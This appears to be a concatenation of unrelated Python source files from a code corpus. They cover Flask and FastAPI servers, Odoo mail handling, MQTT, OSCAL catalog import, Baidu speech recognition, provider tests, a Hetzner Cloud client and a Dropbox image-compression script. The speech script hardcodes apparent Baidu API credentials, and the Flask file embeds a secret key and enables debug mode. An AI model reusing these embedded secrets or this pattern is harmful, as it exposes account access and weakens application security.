send_file(photo)\r\n\telse :\r\n\t\treturn send_from_directory('./profil_pictures','unknown.jpg')\r\n\r\n@app.route('/event_pictures/')\r\ndef event_pictures(id):\r\n\tphoto = glob.glob('./event_pictures/{0}.*'.format(id))\r\n\tif photo:\r\n\t\tphoto = photo[0]\r\n\t\tprint(\"PHOTO est {0}\".format(photo))\r\n\tif photo :\r\n\t\treturn send_file(photo)\r\n\telse :\r\n\t\treturn send_from_directory('./event_pictures','unknown.png')\r\n\t\tprint(\"PHOTO est {0}\".format(unknown))\r\n\r\n\r\napp.secret_key = '\\xd6\\x94|\\x98\\x87Y\\x1d\\x8ea\\xdb\\x14HW\\x04\\x0f\\x80\\x11i\\xc0\\x8f\\xa2\\x931\\x8e'\r\n\r\nif __name__ == '__main__':\r\n\tapp.run(debug=True)\r\n\tconnection.close()\r\n","sub_path":"Archives/Back-End Flask-Pyhtonv6/serveur.py","file_name":"serveur.py","file_ext":"py","file_size_in_byte":16431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"600091984","text":"from fastapi import FastAPI, Query\nfrom get_response_msg import *\nfrom model import *\n\napp = FastAPI()\n\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"COVID-19 DATA OF CN, USA & THE WORLD\"}\n\n\n@app.get(\"/ncov/world_today\", response_model=WorldTodayModel)\nasync def get_world_data_today():\n data = get_world_today()\n return data\n\n\n@app.get(\"/ncov/cn_province_today\", response_model=ProvinceTodayModel)\nasync def get_china_province_data_today():\n data = get_cn_province_today()\n return data\n\n\n@app.get(\"/ncov/cn_data_stream\", response_model=CountryDataStreamModel)\nasync def get_china_data_stream(\n start_date: str = Query(..., description='start Date', example='2019-12-01'),\n end_date: str = Query(..., description='end date', example='2021-02-03')\n):\n data = get_cn_data_stream(start_date, end_date)\n return data\n\n\n@app.get(\"/ncov/us_data_stream\", response_model=CountryDataStreamModel)\nasync def get_usa_data_stream(\n start_date: str = Query(..., description='start Date', example='2019-12-01'),\n end_date: str = Query(..., description='end date', example='2021-02-03')):\n data = get_us_data_stream(start_date, end_date)\n return data\n\n\n@app.get(\"/ncov/us_state_today\", response_model=ProvinceTodayModel)\nasync def get_usa_state_data_today():\n data = get_us_state_today()\n return data\n\n\n@app.get(\"/ncov/us_city_today\")\nasync def get_usa_city_data_today():\n data = get_us_city_today()\n return data\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"652741329","text":"# -*- coding: utf-8 -*-\n\nfrom openerp.osv import fields, osv\n\nclass mail_message(osv.osv):\n\n _inherit=\"mail.message\"\n\n def _notify(self, cr, uid, newid, context=None):\n \"\"\" Add the related record followers to the destination partner_ids if is not a private message.\n Call mail_notification.notify to manage the email sending\n \"\"\"\n notification_obj = self.pool.get('mail.notification')\n message = self.browse(cr, uid, newid, context=context)\n\n partners_to_notify = set([])\n # message has no subtype_id: pure log message -> no partners, no one notified\n if not message.subtype_id:\n return True\n\n #bsbs remove adding follower to mail\n # all followers of the mail.message document have to be added as partners and notified\n #if message.model and message.res_id:\n # fol_obj = self.pool.get(\"mail.followers\")\n \t# # browse as SUPERUSER because rules could restrict the search results\n # fol_ids = fol_obj.search(cr, SUPERUSER_ID, [\n # ('res_model', '=', message.model),\n # ('res_id', '=', message.res_id),\n # ('subtype_ids', 'in', message.subtype_id.id)\n # ], context=context)\n # partners_to_notify |= set(fo.partner_id for fo in fol_obj.browse(cr, SUPERUSER_ID, fol_ids, context=context))\n\n # remove me from notified partners, unless the message is written on my own wall\n if message.author_id and message.model == \"res.partner\" and message.res_id == message.author_id.id:\n partners_to_notify |= set([message.author_id])\n elif message.author_id:\n partners_to_notify -= set([message.author_id])\n\n # all partner_ids of the mail.message have to be notified regardless of the above (even the author if explicitly added!)\n if message.partner_ids:\n partners_to_notify |= set(message.partner_ids)\n\n # notify\n if partners_to_notify:\n notification_obj._notify(cr, uid, newid, partners_to_notify=[p.id for p in partners_to_notify], context=context)\n message.refresh()\n\n # An error appear when a user receive a notification without notifying\n # the parent message -> add a read notification for the parent\n if message.parent_id:\n # all notified_partner_ids of the mail.message have to be notified for the parented messages\n partners_to_parent_notify = set(message.notified_partner_ids).difference(message.parent_id.notified_partner_ids)\n for partner in partners_to_parent_notify:\n notification_obj.create(cr, uid, {\n 'message_id': message.parent_id.id,\n 'partner_id': partner.id,\n 'read': True,\n }, context=context)\nmail_message()","sub_path":"wf_mail/mail_message.py","file_name":"mail_message.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"418261028","text":"import binascii\nimport mptn as MPTN\nimport struct\nfrom gevent import socket\n\nHEADER_FORMAT_STR = \"!\" + ''.join([{1:'B',2:'H',4:'I',8:'Q'}[i] for i in MPTN.MULT_PROTO_HEADER_FORMAT])\n\ndef split_packet_header(message):\n return [message[MPTN.MULT_PROTO_DEST_BYTE_OFFSET:MPTN.MULT_PROTO_SRC_BYTE_OFFSET], message[MPTN.MULT_PROTO_SRC_BYTE_OFFSET:MPTN.MULT_PROTO_MSG_TYPE_BYTE_OFFSET], message[MPTN.MULT_PROTO_MSG_TYPE_BYTE_OFFSET:MPTN.MULT_PROTO_MSG_SUBTYPE_BYTE_OFFSET], message[MPTN.MULT_PROTO_MSG_SUBTYPE_BYTE_OFFSET:MPTN.MULT_PROTO_MSG_PAYLOAD_BYTE_OFFSET]]\n\ndef formatted_print(msg):\n \"\"\"Receives all message parts from socket, printing each frame neatly\"\"\"\n r = \"----------------------------------------\\n\"\n for part in msg:\n r += \"[%03d]\" % len(part) # Trailing comma suppresses newline\n try:\n r += \"%s\" % part.decode('ascii')\n r += \"\\t(\"\n r += r\"0x%s\" % (binascii.hexlify(part).decode('ascii'))\n r += \")\"\n except UnicodeDecodeError:\n r += r\"0x%s\" % (binascii.hexlify(part).decode('ascii'))\n r += '\\n'\n return r\n\ndef create_mult_proto_header_to_str(dest_did, src_did, msg_type, msg_subtype):\n l = [dest_did, src_did, msg_type, msg_subtype]\n h = struct.pack(HEADER_FORMAT_STR, *l)\n return h\n\ndef extract_mult_proto_header_from_str(s):\n header = s[:MPTN.MULT_PROTO_MSG_PAYLOAD_BYTE_OFFSET]\n return struct.unpack(HEADER_FORMAT_STR, header)\n\ndef special_recv(sock):\n size = sock.recv(struct.calcsize(\"!L\"))\n size = socket.ntohl(struct.unpack(\"!L\", size)[0])\n message = \"\"\n while len(message) < size:\n message += sock.recv(size - len(message))\n return message\n\ndef special_send(sock, message):\n size = struct.pack(\"!L\",socket.htonl(len(message)))\n sock.send(size)\n sock.sendall(message)","sub_path":"wukong/gateway/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"647539382","text":"import paho.mqtt.client as mqtt\n\n# get the localhost IP by using \"hostname -I\" in terminal\nbroker_ip = \"10.128.0.3\"\n\n# 1883 is a default port that is unencrypted\nbroker_port = 1883\n\ndef imitation_bme():\n bme_data = \"\"\n return bme_data\n\nif __name__ == '__main__':\n client = mqtt.Client()\n client.connect(broker_ip, broker_port)\n client.publish(topic=\"OpenAgBloom/Air/BME\", payload=imitation_bme(), qos=1,\n retain=False)\n","sub_path":"environmental-boat-project/publisher2.py","file_name":"publisher2.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"180287920","text":"#!/usr/bin/env python\n\nimport sys\nimport os\n\ndef checkdir(outfile):\n outdir = os.path.dirname(outfile)\n if outdir == '':\n outdir = os.getcwd()\n if not os.path.isdir(outdir):\n print('\\nThe directory {} doesn\\'t exist...'.format(outdir)\\\n + 'creating it...\\n')\n os.makedirs(outdir)\n return\n","sub_path":"support_functions/checkdir.py","file_name":"checkdir.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"384563596","text":"from scripts.usefullFunctions import *\nimport ssp.models as t\nimport json\nimport os\nimport shutil\nimport sys\n\nadded_nist_controls = 0\nupdated_nist_controls = 0\ncontrol_baseline = t.control_baseline\n\ndef break_up_catalog(file_path, file_name):\n \"\"\"\n Takes an OSCAL Catalog file and breaks it into seperate json files.\n One file is created for each family, control, and enhancement\n family file will contain all controls and control file will contain all enhancements\n so you cna go on to process these at whatever level you want\n \"\"\"\n startLogging()\n logging.debug(\"Loading JSON...\")\n\n catalog_source = file_name.replace('.json', '')\n catalog_dir = BASE_DIR + '/source/tmp/' + catalog_source\n\n if os.path.isdir(catalog_dir):\n shutil.rmtree(catalog_dir)\n os.makedirs(catalog_dir)\n\n catalogDict = json.loads(open(file_path, 'r', encoding='utf8').read())\n\n for group in catalogDict['catalog']['groups']:\n group_directory_name = catalog_dir + \"/\" + group.get(\"id\") + \"/\"\n os.makedirs(group_directory_name)\n # gf = open(group_file_name,'w')\n # json.dump(group,gf,indent=4)\n for control in group['controls']:\n control[\"group_title\"] = group[\"title\"]\n control[\"catalog\"] = catalog_source\n control_file_name = group_directory_name + control['id'] + \".json\"\n cf = open(control_file_name, 'w', encoding='utf8')\n json.dump(control, cf, indent=4)\n if 'controls' in control:\n for enhancement in control['controls']:\n enhancement[\"group_title\"] = group[\"title\"]\n enhancement[\"catalog\"] = catalog_source\n enhancement_file_name = group_directory_name + enhancement['id'] + \".json\"\n ef = open(enhancement_file_name, 'w', encoding='utf8')\n json.dump(enhancement, ef, indent=4)\n\ndef import_all_controls(path):\n \"\"\"\n imports all control json files in given directory\n \"\"\"\n import os\n if control_baseline:\n control_baseline.controls.clear()\n for root, dirs, files in os.walk(path, topdown=False):\n for name in files:\n if name.endswith(\".json\"):\n import_individual_control(os.path.join(root, name))\n # for name in dirs:\n # print(os.path.join(root, name))\n\n\ndef save_parameter(id, type, text, nist_control, depends_on=''):\n param_id, created = t.nist_control_parameter.objects.update_or_create(param_id=id, nist_control=nist_control,\n defaults={'param_id':id,\n 'param_type':type,\n 'param_text':text,\n 'param_depends_on':depends_on,\n 'nist_control':nist_control\n })\n return param_id\n\n\ndef clean_param_text(str):\n str = str.translate(str.maketrans('', '', '\\n\\t\\r')).split(' ')\n while ('' in str):\n str.remove('')\n return ' '.join(str)\n\n\ndef import_individual_control(file_name):\n logging.debug(\"Opening file \" + file_name)\n cntrl = json.loads(open(file_name, 'r', encoding='utf8').read())\n group_id = str(cntrl[\"id\"][0:2]).upper()\n group_title = cntrl[\"group_title\"]\n cntrl_catalog = cntrl[\"catalog\"]\n parameter_list = []\n cntrl_status = \"Active\"\n cntrl_label = \"\"\n cntrl_sortID = \"\"\n global added_nist_controls, updated_nist_controls\n\n\n for item in cntrl[\"properties\"]:\n if item[\"name\"] == 'status':\n cntrl_status = item[\"value\"]\n if item[\"name\"] == 'label':\n cntrl_label = item[\"value\"]\n if item[\"name\"] == 'sort-id':\n cntrl_sortID = item[\"value\"]\n\n control_id, created = t.nist_control.objects.update_or_create(group_id=group_id,\n group_title=group_title,\n source=cntrl_catalog,\n control_id=cntrl[\"id\"],\n defaults={'group_id':group_id,\n 'group_title':group_title,\n 'source':cntrl_catalog,\n 'control_id':cntrl[\"id\"],\n 'control_title':cntrl[\"title\"],\n 'label':cntrl_label,\n 'sort_id':cntrl_sortID,\n 'status':cntrl_status,\n 'catalog':cntrl_catalog\n })\n\n if control_baseline:\n control_baseline.controls.add(control_id)\n\n if not created:\n logging.debug(\"Found existing entry for \" + cntrl[\"title\"] + \" from catalog \" + cntrl_catalog)\n updated_nist_controls += 1\n\n else:\n logging.debug(\"No existing entry for \" + cntrl[\"title\"] + \"from catalog \" + cntrl_catalog + \" found. Created New entry.\")\n added_nist_controls += 1\n\n\n\n if 'parameters' in cntrl:\n for param in cntrl['parameters']:\n param_id = None\n if 'label' in param:\n if 'depends-on' in param:\n param_id = save_parameter(param[\"id\"], \"label\", clean_param_text(param['label']), control_id,\n param[\"depends-on\"])\n else:\n param_id = save_parameter(param[\"id\"], \"label\", clean_param_text(param['label']), control_id)\n if 'select' in param:\n param_text = ','.join(param['select']['alternatives'])\n param_id = save_parameter(param[\"id\"], \"select\", clean_param_text(param_text), control_id)\n\n\n if 'parts' in cntrl:\n cntrl_stmnt_text = ''\n logging.debug(\"Found parts, extracting (better strap in, this could get messy)...\")\n for part in cntrl['parts']:\n cntrl_stmnt_text += addControlPart(part)\n t.nist_control_statement.objects.get_or_create(statement_type=part['name'],\n nist_control_id=control_id.id,\n statement_text=cntrl_stmnt_text)\n cntrl_stmnt_text = ''\n\n\ndef addControlPart(part, indent=0):\n t = ''\n logging.debug(\"Extracting Part...\")\n if 'title' in part:\n logging.debug(\"Found part Title...\")\n t = \"\" + part['title'] + \"\"\n logging.debug(\"Title added...\")\n if 'properties' in part:\n logging.debug(\"Found properties, extracting...\")\n for p in part['properties']:\n if p['name'] == 'label':\n t += '
\\n' + str(' ' * indent) + p['value'] + ' '\n logging.debug(\"Property added...\")\n if 'prose' in part:\n logging.debug(\"Found prose, extracting...\")\n t += part['prose']\n logging.debug(\"Prose added...\")\n if 'parts' in part:\n for subpart in part['parts']:\n logging.debug(\"Found subpart, extracting...\")\n t += addControlPart(subpart, indent + 2)\n logging.debug(\"Added subpart...\")\n return t\n\n\ndef run(catalog_control_baseline=None, file_path=BASE_DIR + '/source/NIST_SP-800-53_rev4_catalog.json', file_name='NIST_SP-800-53_rev4_catalog.json'):\n global added_nist_controls, updated_nist_controls, control_baseline\n added_nist_controls = updated_nist_controls = 0\n control_baseline = catalog_control_baseline\n\n break_up_catalog(file_path, file_name)\n #break_up_catalog(BASE_DIR + '/source/', \"NIST_SP-800-53_rev5-FINAL_catalog.json\")\n import_all_controls(BASE_DIR + '/source/tmp/' + file_name.replace('.json', ''))\n return added_nist_controls, updated_nist_controls\n\n#Modified this file to use it in import_catalog view which imports one catalog file at a time.\n\n","sub_path":"scripts/OSCAL_Catalog_import.py","file_name":"OSCAL_Catalog_import.py","file_ext":"py","file_size_in_byte":8493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"169572697","text":"# encoding:utf-8\n\nimport pyaudio\nimport wave\nimport sys\nimport numpy as np\nfrom aip import AipSpeech\n\n\n\nclass voice_recognition(object):\n\t\"\"\"语音识别类\"\"\"\n\n\tdef __init__(self):\n\t\t\"\"\" 你的 APPID AK SK \"\"\"\n\t\tself._APP_ID = '10498635'\n\t\tself._API_KEY = '7H3a8MI3qNAb9N4RunPegIpr'\n\t\tself._SECRET_KEY = 'aac58e43cc056ca4b616040df77bd845'\n\t\tself._aipSpeech = AipSpeech(self._APP_ID, self._API_KEY, self._SECRET_KEY)\n\n\t# record the sound and write in the wav file\n\tdef record(self):\n\t\tCHUNK = 1024\n\t\tFORMAT = pyaudio.paInt16\n\t\tCHANNELS = 1\n\t\tRATE = 16000\n\t\tRECORD_SECONDS = 5\n\t\tself._WAVE_OUTPUT_FILENAME = 'recorded_audio.wav'\n\n\t\tif sys.platform == 'darwin':\n\t\t\tCHANNELS = 1\n\n\t\tp = pyaudio.PyAudio()\n\n\t\tstream = p.open(format=FORMAT,\n\t\t\t\t\t\tchannels=CHANNELS,\n\t\t\t\t\t\trate=RATE,\n\t\t\t\t\t\tinput=True,\n\t\t\t\t\t\tframes_per_buffer=CHUNK)\n\n\t\tprint(\"You can speak now:\")\n\n\t\tframes = []\n\n\t\tfor i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n\t\t\tdata = stream.read(CHUNK)\n\t\t\tframes.append(data)\n\n\t\tstream.stop_stream()\n\t\tstream.close()\n\t\tp.terminate()\n\n\t\twf = wave.open(self._WAVE_OUTPUT_FILENAME, 'wb')\n\t\twf.setnchannels(CHANNELS)\n\t\twf.setsampwidth(p.get_sample_size(FORMAT))\n\t\twf.setframerate(RATE)\n\t\twf.writeframes(b''.join(frames))\n\t\twf.close()\n\n\t\treturn self._WAVE_OUTPUT_FILENAME\n\n\n\t# 判断是否有声音录入,有则返回1,无返回0,读取录制好的音频,看它的帧数\n\tdef speaking(self, audiofile, threshold=70):\n\t\twavfile = wave.open(audiofile, \"rb\")\n\t\t# print(wavfile)\n\t\tparams = wavfile.getparams()\n\t\tframesra,frameswav= params[2],params[3]\n\t\tdatawav = wavfile.readframes(frameswav)\n\t\tdatause = np.fromstring(datawav,dtype = np.short)\n\t\taverage = np.average(abs(datause),weights=abs(datause))\n\t\ttime = np.arange(0, frameswav) * (1.0/framesra)\n\t\t# print(abs(datause))\n\t\t# print('datause=', datause)\n\t\t# print('time=', time)\n\t\t# print('average=', average) #计算加权平均,提升输出值大权重的占比\n\t\tif average > threshold: #大于阈值,有声音录入\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\t# recognition the voice\n\tdef recognition(self):\n\t\t# aipSpeech.setConnectionTimeoutInMillis(3000)\n\t\t# aipSpeech.setSocketTimeoutInMillis(5000)\n\t\tfile_name = self.record() #调用录音函数\n\t\tif self.speaking(file_name): #有声音录入\n\t\t\tprint(\"Please wait for recognizing ...\")\n\t\t\twith open(file_name, 'rb') as wav_file:\n\t\t\t\t# 识别本地文件\n\t\t\t\t#print(type(wav_file))\n\t\t\t\t# a= aipSpeech.asr(get_file_content('public/test.pcm'), 'pcm', 16000, { 'lan': 'zh',})\n\t\t\t\treponse_result =self._aipSpeech.asr(wav_file.read(), 'wav', 16000, { 'lan': 'zh',})\n\t\t\t\tif len(reponse_result)>3: #识别错误后返回3个长度的字典\n\t\t\t\t\trec_content = reponse_result['result'][0].strip().strip(',')\n\t\t\t\t\tprint('human:', rec_content)\n\t\t\t\t\treturn rec_content\n\t\t\t\telse:\n\t\t\t\t\tprint(reponse_result)\n\t\t\t\t\tprint(\"robot: sorry, I can't listen clearly!\")\n\t\t\t\t\treturn '' # 如果识别失败返回空字符\n\t\telse:\n\t\t\tprint('robot: Please continue to speak!')\n\t\t\treturn '' # 如果没有声音录入也返回空字符\n\nif __name__ == '__main__':\n\tvoice = voice_recognition() #实例化一个类\n\tcontent = voice.recognition() #调用识别函数\n\t# print(content)\n","sub_path":"script/audio_interactive/voice/voice_recognition.py","file_name":"voice_recognition.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"17048658","text":"# -*- coding: utf-8 -*-\n\n# Copyright (C) 2015 Luis López \n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,\n# USA.\n\n\nimport unittest\n\n\nfrom arroyo.services import Services\nfrom arroyo.query import Query\nfrom arroyo.plugins.providers import IncompatibleQueryError\n\n\nfrom arroyo.plugins.providers.epublibre import EPubLibre\nfrom arroyo.plugins.providers.eztv import EzTV\nfrom arroyo.plugins.providers.torrentapi import TorrentAPI\n\n\nclass TestProviderMixin:\n PROVIDER_CLASS = None\n TEST_HANDLED_URLS = []\n TEST_HANDLED_URLS_NEGATIVE = []\n TEST_QUERY_URLS = []\n\n def _get_provider_cls(self):\n return self.PROVIDER_CLASS\n\n def _get_provider(self):\n return self._get_provider_cls()(Services())\n\n def test_default_uri(self):\n cls = self._get_provider_cls()\n default_uri = getattr(cls, 'DEFAULT_URI', None)\n\n self.assertTrue(isinstance(default_uri, str) and\n default_uri != '',\n msg=\"provider doesn't have default uri\")\n\n self.assertTrue(cls.can_handle(default_uri),\n msg=\"provider can't handle its own default uri\")\n\n def test_handlers(self):\n cls = self._get_provider_cls()\n globs = getattr(cls, 'URI_GLOBS')\n regexps = getattr(cls, 'URI_REGEXPS')\n\n self.assertTrue(isinstance(globs, list))\n self.assertTrue(isinstance(regexps, list))\n self.assertTrue(globs or regexps)\n\n def test_paginate(self):\n # FIXME: Not tested\n provider = self._get_provider()\n g = provider.paginate(provider.DEFAULT_URI)\n\n uris = set()\n count = 0\n for _ in range(10):\n try:\n uris.add(next(g))\n count = count + 1\n except StopIteration:\n break\n\n self.assertTrue(len(uris) > 0,\n msg=\"paginate doesn't produce any element\")\n self.assertTrue(len(uris) == count,\n msg=\"paginate produces duplicates\")\n\n def test_url_handler(self):\n cls = self._get_provider_cls()\n tests = ([(url, True) for url in self.TEST_HANDLED_URLS] +\n [(url, False) for url in self.TEST_HANDLED_URLS_NEGATIVE])\n\n for (url, expected) in tests:\n can_handle = cls.can_handle(url)\n self.assertTrue(can_handle == expected)\n\n def test_query(self):\n provider = self._get_provider()\n for (query, url_or_exc) in self.TEST_QUERY_URLS:\n if isinstance(query, str):\n query = Query.fromstring(query)\n else:\n query = Query(**query)\n\n if type(url_or_exc) is type and issubclass(url_or_exc, Exception):\n with self.assertRaises(url_or_exc):\n provider.get_query_uri(query)\n else:\n url = provider.get_query_uri(query)\n self.assertEqual(url_or_exc, url)\n\n def test_parse(self):\n pass\n\n\nclass TestEPubLibre(TestProviderMixin, unittest.TestCase):\n PROVIDER_CLASS = EPubLibre\n TEST_QUERY_URLS = [\n ('westworld.s01e02', IncompatibleQueryError),\n ('some.movie.2019', IncompatibleQueryError),\n (dict(type='ebook', ebook_title='title'), 'https://epublibre.org/catalogo/index/0/nuevo/novedades/sin/todos/title'),\n (dict(type='ebook', ebook_title='title', ebook_author='author'), 'https://epublibre.org/catalogo/index/0/nuevo/novedades/sin/todos/author%20title'),\n (dict(type='ebook', ebook_author='author'), 'https://epublibre.org/catalogo/index/0/nuevo/novedades/sin/todos/author'),\n (dict(type='ebook', name='title'), 'https://epublibre.org/catalogo/index/0/nuevo/novedades/sin/todos/title'),\n (dict(type='ebook', other='foo'), IncompatibleQueryError),\n ]\n\n\nclass TestEzTV(TestProviderMixin, unittest.TestCase):\n PROVIDER_CLASS = EzTV\n TEST_QUERY_URLS = [\n ('westworld.s01e02', 'https://eztv.io/search/westworld'),\n ('some.movie.2019', IncompatibleQueryError)\n ]\n\n\nclass TestTorrentAPI(TestProviderMixin, unittest.TestCase):\n PROVIDER_CLASS = TorrentAPI\n TEST_QUERY_URLS = [\n ('westworld.s01e02', 'http://torrentapi.org/pubapi_v2.php?app_id=arroyo&mode=search&search_string=westworld+S01E02&category=tv'),\n ('some.movie.2019', 'http://torrentapi.org/pubapi_v2.php?app_id=arroyo&mode=search&search_string=some+movie&category=movies')\n ]\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_providers.py","file_name":"test_providers.py","file_ext":"py","file_size_in_byte":5149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"380438470","text":"# -*- coding: utf-8 -*-\nfrom typing import TYPE_CHECKING\n\nfrom hcloud.core.client import ClientEntityBase, BoundModelBase, GetEntityByNameMixin\n\nfrom hcloud.certificates.domain import Certificate\n\n\nif TYPE_CHECKING:\n from typing import Any, Dict, List, Optional\n from hcloud.core.domain import Meta, PageResults\n\n\nclass BoundCertificate(BoundModelBase):\n model = Certificate\n\n def update(self, name=None, labels=None):\n # type: (Optional[str], Optional[Dict[str, str]]) -> BoundCertificate\n \"\"\"Updates an certificate. You can update an certificate name and the certificate labels.\n\n :param name: str (optional)\n New name to set\n :param labels: Dict[str, str] (optional)\n User-defined labels (key-value pairs)\n :return: :class:`BoundCertificate \n \"\"\"\n return self._client.update(self, name, labels)\n\n def delete(self):\n # type: () -> bool\n \"\"\"Deletes a certificate.\n :return: boolean\n \"\"\"\n return self._client.delete(self)\n\n\nclass CertificatesClient(ClientEntityBase, GetEntityByNameMixin):\n results_list_attribute_name = 'certificates'\n\n def get_by_id(self, id):\n # type: (int) -> BoundCertificate\n \"\"\"Get a specific certificate by its ID.\n\n :param id: int\n :return: :class:`BoundCertificate `\n \"\"\"\n response = self._client.request(url=\"/certificates/{certificate_id}\".format(certificate_id=id), method=\"GET\")\n return BoundCertificate(self, response['certificate'])\n\n def get_list(self,\n name=None, # type: Optional[str]\n label_selector=None, # type: Optional[str]\n page=None, # type: Optional[int]\n per_page=None # type: Optional[int]\n ):\n # type: (...) -> PageResults[List[BoundCertificate], Meta]\n \"\"\"Get a list of certificates\n\n :param name: str (optional)\n Can be used to filter certificates by their name.\n :param label_selector: str (optional)\n Can be used to filter certificates by labels. The response will only contain certificates matching the label selector.\n :param page: int (optional)\n Specifies the page to fetch\n :param per_page: int (optional)\n Specifies how many results are returned by page\n :return: (List[:class:`BoundCertificate `], :class:`Meta `)\n \"\"\"\n params = {} # type: Dict[str, Any]\n if name is not None:\n params[\"name\"] = name\n\n if label_selector is not None:\n params[\"label_selector\"] = label_selector\n\n if page is not None:\n params['page'] = page\n\n if per_page is not None:\n params['per_page'] = per_page\n\n response = self._client.request(url=\"/certificates\", method=\"GET\", params=params)\n\n certificates = [BoundCertificate(self, certificate_data) for certificate_data in response['certificates']]\n\n return self._add_meta_to_result(certificates, response)\n\n def get_all(self, name=None, label_selector=None):\n # type: (Optional[str], Optional[str]) -> List[BoundCertificate]\n \"\"\"Get all certificates\n\n :param name: str (optional)\n Can be used to filter certificates by their name.\n :param label_selector: str (optional)\n Can be used to filter certificates by labels. The response will only contain certificates matching the label selector.\n :return: List[:class:`BoundCertificate `]\n \"\"\"\n return super(CertificatesClient, self).get_all(name=name, label_selector=label_selector)\n\n def get_by_name(self, name):\n # type: (str) -> BoundCertificate\n \"\"\"Get certificate by name\n\n :param name: str\n Used to get certificate by name.\n :return: :class:`BoundCertificate `\n \"\"\"\n return super(CertificatesClient, self).get_by_name(name)\n\n def create(self, name, certificate, private_key, labels=None):\n # type: (str, str, str, Optional[Dict[str, str]]) -> BoundCertificate\n \"\"\"Creates a new Certificate with the given name, certificate and private_key.\n\n :param name: str\n :param certificate: str\n Certificate and chain in PEM format, in order so that each record directly certifies the one preceding\n :param private_key: str\n Certificate key in PEM format\n :param labels: Dict[str, str] (optional)\n User-defined labels (key-value pairs)\n :return: :class:`BoundCertificate `\n \"\"\"\n data = {\n 'name': name,\n 'certificate': certificate,\n 'private_key': private_key\n } # type: Dict[str, Any]\n if labels is not None:\n data['labels'] = labels\n response = self._client.request(url=\"/certificates\", method=\"POST\", json=data)\n return BoundCertificate(self, response['certificate'])\n\n def update(self, certificate, name=None, labels=None):\n # type: (Certificate, Optional[str], Optional[Dict[str, str]]) -> BoundCertificate\n \"\"\"Updates a Certificate. You can update a certificate name and labels.\n\n :param certificate: :class:`BoundCertificate ` or :class:`Certificate `\n :param name: str (optional)\n New name to set\n :param labels: Dict[str, str] (optional)\n User-defined labels (key-value pairs)\n :return: :class:`BoundCertificate `\n \"\"\"\n data = {} # type: Dict[str, Any]\n if name is not None:\n data['name'] = name\n if labels is not None:\n data['labels'] = labels\n response = self._client.request(url=\"/certificates/{certificate_id}\".format(certificate_id=certificate.id),\n method=\"PUT\",\n json=data)\n return BoundCertificate(self, response['certificate'])\n\n def delete(self, certificate):\n # type: (Certificate) -> bool\n self._client.request(url=\"/certificates/{certificate_id}\".format(certificate_id=certificate.id),\n method=\"DELETE\")\n \"\"\"Deletes a certificate.\n\n :param certificate: :class:`BoundCertificate ` or :class:`Certificate `\n :return: True\n \"\"\"\n # Return always true, because the API does not return an action for it. When an error occurs a HcloudAPIException will be raised\n return True\n","sub_path":"hcloud/certificates/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":7032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"376596896","text":"import os\nimport tinify\nimport dropbox\nimport dropbox.files\nimport datetime\n\n# CREATE .txt FILES WITH ACCESS CREDENTIALS\nif os.path.isfile(\"./dropkey.txt\"):\n with open(\"./dropkey.txt\") as file:\n dropkey = file.read()\nelse:\n dropkey = input(\"Type your Dropbox App Token: \")\n with open(\"dropkey.txt\", \"w+\") as f:\n f.write(dropkey)\n\nif os.path.isfile(\"./tinikey.txt\"):\n with open(\"./tinikey.txt\") as file:\n tinikey = file.read()\nelse:\n tinikey = input(\"Type your Tinify API Token: \")\n with open(\"tinikey.txt\", \"w+\") as f:\n f.write(tinikey)\n\n# SELECT SOURCE AND DESTINATION FOLDER\nsource_folder = input(\n \"Where are your original photos stored? (Leave empty if in app's root folder) \")\nif source_folder != \"\":\n source_folder = \"/\" + source_folder\n\ndest_folder = input(\n \"Where do you want to store the optimized photos? \")\n#dest_folder = \"/\" + dest_folder\n\n# AUTHENTICATION\ndbx = dropbox.Dropbox(dropkey)\ntinify.key = tinikey\n\ndbx.users_get_current_account()\nresponse = dbx.files_list_folder(source_folder)\nfiles = response.entries\n\n# CHECKING FOR DESTINATION FOLDER IN DROPBOX\nfound = False\nfor item in response.entries:\n if str(type(item))[22:-10] == \"Folder\":\n if (str(item.path_display)[1:]) == dest_folder:\n found = True\n else:\n break\nif found == False:\n dbx.files_create_folder(\"/\" + dest_folder)\ndest_folder = \"/\" + dest_folder\n\n# CHECKING FOR FOLDER LOCALLY AND CREATING IF NOT EXISTING\nif not os.path.isdir(\".\" + dest_folder):\n os.mkdir(\".\" + dest_folder)\n\n# COMPRESSING ALL PHOTOS IN GIVEN FOLDER\nfor item in files:\n if str(type(item))[22:-10] == \"File\":\n source = tinify.from_url(\n dbx.files_get_temporary_link(item.path_display).link)\n dest = 